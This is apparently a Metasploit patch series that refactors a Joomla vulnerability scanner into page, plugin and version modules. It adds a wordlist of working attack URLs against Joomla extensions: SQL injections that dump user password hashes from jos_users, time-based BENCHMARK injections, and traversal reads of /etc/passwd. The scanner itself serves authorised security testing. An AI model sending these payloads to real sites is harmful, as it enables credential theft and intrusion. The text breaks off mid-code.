-index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- -index.php?option=com_alfurqan15x&action=viewayat&surano= -index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version -index.php?option=com_annonces&view=edit&Itemid=1 -index.php?option=com_articleman&task=new -index.php?option=com_bbs&bid=-1 -index.php?option=com_beamospetition&startpage=3&pet=- -index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- -index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 -index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 -index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- -index.php?option=com_chronoconnectivity&itemid=1 -index.php?option=com_chronocontact&itemid=1 -index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= -index.php?option=com_clantools&squad=1+ -index.php?option=com_clantools&task=clanwar&showgame=1+ -index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' -index.php?option=com_commedia&task=page&commpid=21 -index.php?option=com_connect&view=connect&controller= -index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ -index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_dioneformwizard&controller=[LFI]%00 -index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 -index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 -index.php?option=com_easyfaq&Itemid=1&task=view&gid= -index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ -index.php?option=com_easyfaq&task=view&contact_id= -index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= -index.php?option=com_equipment&task=components&id=45&sec_men_id= -index.php?option=com_equipment&view=details&id= -index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] -index.php?option=com_etree&view=displays&layout=category&id=[SQL] -index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] -index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 -index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- -index.php?option=com_filecabinet&task=download&cid[]=7 -index.php?option=com_firmy&task=section_show_set&Id=-1 -index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R -index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= -index.php?option=com_graphics&controller= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= -index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= -index.php?option=com_huruhelpdesk&view=detail -index.php?option=com_huruhelpdesk&view=detail&cid[0]= -index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 -index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 -index.php?option=com_iproperty&view=agentproperties&id= -index.php?option=com_jacomment&view= -index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 -index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_jcommunity&controller=members&task=1' -index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 -index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 -index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 -index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 -index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_jfuploader&Itemid= -index.php?option=com_jgen&task=view&id= -index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 -index.php?option=com_jimtawl&Itemid=12&task= -index.php?option=com_jmarket&controller=product&task=1' -index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' -index.php?option=com_jomdirectory&task=search&type=111+ -index.php?option=com_joomdle&view=detail&cat_id=1&course_id= -index.php?option=com_joomla_flash_uploader&Itemid=1 -index.php?option=com_joomleague&func=showNextMatch&p=[sqli] -index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] -index.php?option=com_joomtouch&controller= -index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 -index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 -index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users -index.php?option=com_jstore&controller=product-display&task=1' -index.php?option=com_jsubscription&controller=subscription&task=1' -index.php?option=com_jtickets&controller=ticket&task=1' -index.php?option=com_konsultasi&act=detail&sid= -index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en -index.php?option=com_kunena&func=userlist&search= -index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' -index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- -index.php?option=com_matamko&controller= -index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm -index.php?option=com_neorecruit&task=offer_view&id= -index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- -index.php?option=com_noticeboard&controller= -index.php?option=com_obsuggest&controller= -index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- -index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- -index.php?option=com_oziogallery&Itemid= -index.php?option=com_page&id=53 -index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) -index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 -index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] -index.php?option=com_phocagallery&view=categories&Itemid= -index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_php&file=../../../../../../../../../../etc/passwd -index.php?option=com_php&file=../images/phplogo.jpg -index.php?option=com_php&file=../js/ie_pngfix.js -index.php?option=com_ponygallery&Itemid=[sqli] -index.php?option=com_products&catid=-1 -index.php?option=com_products&id=-1 -index.php?option=com_products&product_id=-1 -index.php?option=com_products&task=category&catid=-1 -index.php?option=com_properties&task=agentlisting&aid= -index.php?option=com_qcontacts&Itemid=1' -index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts -index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_restaurantguide&view=country&id='&Itemid=69 -index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' -index.php?option=com_seyret&view= -index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- -index.php?option=com_smartsite&controller= -index.php?option=com_spa&view=spa_product&cid= -index.php?option=com_spidercalendar -index.php?option=com_spidercalendar&date=1' -index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) -index.php?option=com_staticxt&staticfile=test.php&id=1923 -index.php?option=com_szallasok&mode=8&id=25 (SQL) -index.php?option=com_tag&task=tag&tag= -index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- -index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users -index.php?option=com_ultimateportfolio&controller= -index.php?option=com_users&view=registration -index.php?option=com_virtuemart&page=account.index&keyword=[sqli] -index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 -index.php?option=com_x-shop&action=artdetail&idd=' -index.php?option=com_x-shop&action=artdetail&idd='[SQLi] -index.php?option=com_xcomp&controller=../../[LFI]%00 -index.php?option=com_xvs&controller=../../[LFI]%00 -index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- -index.php?option=com_yjcontactus&view= -index.php?option=com_youtube&id_cate=4 -index.php?option=com_zina&view=zina&Itemid=9 -index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= -index.php?search=NoGe&option=com_esearch&searchId= -index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube -index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- -js/index.php?option=com_socialads&view=showad&Itemid=94 -libraries/joomla/utilities/compat/php50x.php -libraries/pcl/pcltar.php -libraries/phpmailer/phpmailer.php -libraries/phpxmlrpc/xmlrpcs.php -modules/mod_artuploader/upload.php"); -modules/mod_as_category.php -modules/mod_calendar.php -modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] -modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); -modules/mod_jfancy/script.php"); -modules/mod_ppc_simple_spotlight/elements/upload_file.php -modules/mod_ppc_simple_spotlight/img/ -modules/mod_pxt/ -modules/mod_quick_question.php -modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 -patch/makedown.php?arquivo=../../../../etc/passwd -plugins/content/efup_files/helper.php"); -plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> -plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ -plugins/editors/xstandard/attachmentlibrary.php -print.php?task=person&id=36 and 1=1 -templates/be2004-2/ -templates/ja_purity/ -wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- -web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 7b497d1846..798496cb74 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - + apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort From 6cdb1a80de61b46853401ef971d7bd470c52ad81 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 24 Jan 2013 09:47:20 -0500 Subject: [PATCH 5/7] Remove app from fingerprint and blank line --- modules/auxiliary/scanner/http/joomla_vulnscan.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 798496cb74..1c465719f1 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary return os end - def fingerprint(response, app) + def fingerprint(response) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -101,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort @@ -137,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) - out = fingerprint(res,app) + out = fingerprint(res) return if not out if(out =~ /Unknown Joomla/) print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") From dd1ce34ecc202d865f724984c7bb55f6ba17dbaa Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 24 Jan 2013 17:04:22 -0500 Subject: [PATCH 6/7] Made recommended changes removed short timeout added returns and other small changes --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 49 ++++++++++--------- 1 file changed, 27 insertions(+), 22 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 1c465719f1..2ad9d2f040 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module scans a Joomla install for information, plugins and potential vulnerabilites. }, - 'Author' => [ 'f8lerror' ], + 'Author' => [ 'newpid0' ], 'License' => MSF_LICENSE ) register_options( @@ -101,22 +101,23 @@ class Metasploit3 < Msf::Auxiliary 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] + vprint_status("#{peer} - Checking Joomla version") apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort break if app_status end - vprint_status("#{peer} - Checking host for interesting pages") + vprint_status("#{peer} - Checking for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking host for interesting plugins") + vprint_status("#{peer} - Checking for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return false if not bres or not bres.body or not bres.code + return if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp @@ -129,10 +130,9 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => "#{tpath}" << app, 'method' => 'GET', - }, 5) + }) return :abort if res.nil? - return false if not res or not res.body or not res.code - vprint_status("#{peer} - Checking host for version information") + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Joomla Version', :data => out ) - return :next_app + return true end elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) @@ -163,25 +163,26 @@ class Metasploit3 < Msf::Auxiliary else vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end - + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def scan_pages(tpath, iapp, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << iapp, 'method' => 'GET', - }, 5) - return false if not res or not res.body or not res.code + }) + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) @@ -213,23 +214,25 @@ class Metasploit3 < Msf::Auxiliary else vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ 'uri' => "#{tpath}" << papp, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size @@ -279,18 +282,20 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{ip} requires a SSL client certificate") else vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end + end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end From d6e9f891ea566c316cf398abe0a507019544a28d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 25 Jan 2013 20:44:49 +0100 Subject: [PATCH 7/7] Proposal for joomla-scanner --- .../auxiliary/scanner/http/joomla_pages.rb | 109 +++++++ .../auxiliary/scanner/http/joomla_plugins.rb | 175 ++++++++++ .../auxiliary/scanner/http/joomla_version.rb | 176 ++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 303 ------------------ 4 files changed, 460 insertions(+), 303 deletions(-) create mode 100755 modules/auxiliary/scanner/http/joomla_pages.rb create mode 100755 modules/auxiliary/scanner/http/joomla_plugins.rb create mode 100755 modules/auxiliary/scanner/http/joomla_version.rb delete mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb new file mode 100755 index 0000000000..77218063a5 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -0,0 +1,109 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for common pages. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + pages = [ + 'robots.txt', + 'administrator/index.php', + 'admin/', + 'index.php/using-joomla/extensions/components/users-component/registration-form', + 'index.php/component/users/?view=registration', + 'htaccess.txt' + ] + + vprint_status("#{peer} - Checking for interesting pages") + pages.each do |page| + scan_pages(tpath, page, ip) + end + + end + + def scan_pages(tpath, page, ip) + res = send_request_cgi({ + 'uri' => "#{tpath}#{page}", + 'method' => 'GET', + }) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + note = "Page Found" + if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + note = "Administrator Login Page" + elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + note = "Registration Page" + end + + print_good("#{peer} - #{note}: #{tpath}#{page}") + + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "#{note}: #{tpath}#{page}", + :update => :unique_data + ) + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") + end + end + + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb new file mode 100755 index 0000000000..37dff56fd4 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 0000000000..5ccdfe89d7 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -0,0 +1,176 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Version Scanner', + 'Description' => %q{ + This module scans a Joomla install for information about the underlying + operating system and Joomla version. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def os_fingerprint(response) + if not response.headers.has_key?('Server') + return "Unkown OS (No Server Header)" + end + + case response.headers['Server'] + when /Win32/ + when /\(Windows/ + when /IIS/ + os = "Windows" + when /Apache\// + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + return os + end + + def fingerprint(response) + case response.body + when /(.+)<\/version\/?>/i + v = $1 + out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ + when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ + when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ + when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ + when /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / + when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ + when /22183 2011\-09\-30 09\:04\:32Z infograf768/ + when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/ + when /MooTools\=\{version\:\'1\.12\'\}/ + when /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ + when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /\s+ "#{tpath}#{file}", + 